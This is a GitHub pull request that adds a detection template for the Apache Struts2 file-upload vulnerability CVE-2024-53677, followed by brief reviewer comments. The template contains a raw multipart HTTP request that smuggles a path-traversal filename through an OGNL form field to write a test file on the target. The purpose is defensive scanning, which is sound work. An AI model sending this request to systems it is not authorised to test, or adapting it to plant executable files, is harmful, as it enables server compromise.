Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2024-53677.yaml #11419

Open
wants to merge 2 commits into
base: main
Choose a base branch
from

Conversation

MrHarshvardhan
Copy link
Contributor

@MrHarshvardhan MrHarshvardhan commented Dec 27, 2024

id: CVE-2024-53677

info:
  name: Apache Struts2 - Arbitrary File Upload Vulnerability (CVE-2024-53677)
  author: MrHarshvardhan
  severity: critical
  description: |
    Apache Struts2 versions affected by CVE-2024-53677 allow arbitrary file uploads via improper OGNL expression handling, enabling attackers to overwrite arbitrary files.
  impact: |
    Successful exploitation could allow remote attackers to overwrite arbitrary files on the server, leading to Remote Code Execution (RCE) or sensitive data exposure.
  remediation: |
    Upgrade Apache Struts2 to a patched version immediately.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-53677
    - https://github.com/TAM-K592/CVE-2024-53677-S2-067/blob/ALOK/Check-CVE-2024-53677.py
  classification:
    cve-id: CVE-2024-53677
    cwe-id: CWE-434
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: Apache
    product: Struts2
  tags: apache,struts2,file-upload,cve2024,critical

variables:
  upload_endpoint: "{{UploadEndpoint}}"

http:
  - raw:
      - |
        POST {{BaseURL}}{{upload_endpoint}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{RandomBoundary}}

        ------WebKitFormBoundary{{RandomBoundary}}
        Content-Disposition: form-data; name="upload"; filename="test.txt"
        Content-Type: text/plain

        S2-067 detection test.
        ------WebKitFormBoundary{{RandomBoundary}}
        Content-Disposition: form-data; name="top.uploadFileName"

        ../../vuln_test.txt
        ------WebKitFormBoundary{{RandomBoundary}}--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "vuln_test.txt")'
        condition: and

@ivaldivieso
Copy link

It seems that the file has an incorrect extension (.ymal). The correct extension should be .yaml. Please update it accordingly to ensure proper handling and compatibility.

@MrHarshvardhan MrHarshvardhan changed the title CVE-2024-53677.ymal CVE-2024-53677.yaml Dec 29, 2024
@MrHarshvardhan
Copy link
Contributor Author

Updated

@princechaddha
Copy link
Member

Hello @MrHarshvardhan, thank you so much for sharing this template with the community and contributing to this project. The team will shortly review and merge this PR.

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again

@princechaddha princechaddha linked an issue Jan 10, 2025 that may be closed by this pull request
1 task
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

Apache Struts Remote Code Execution
4 participants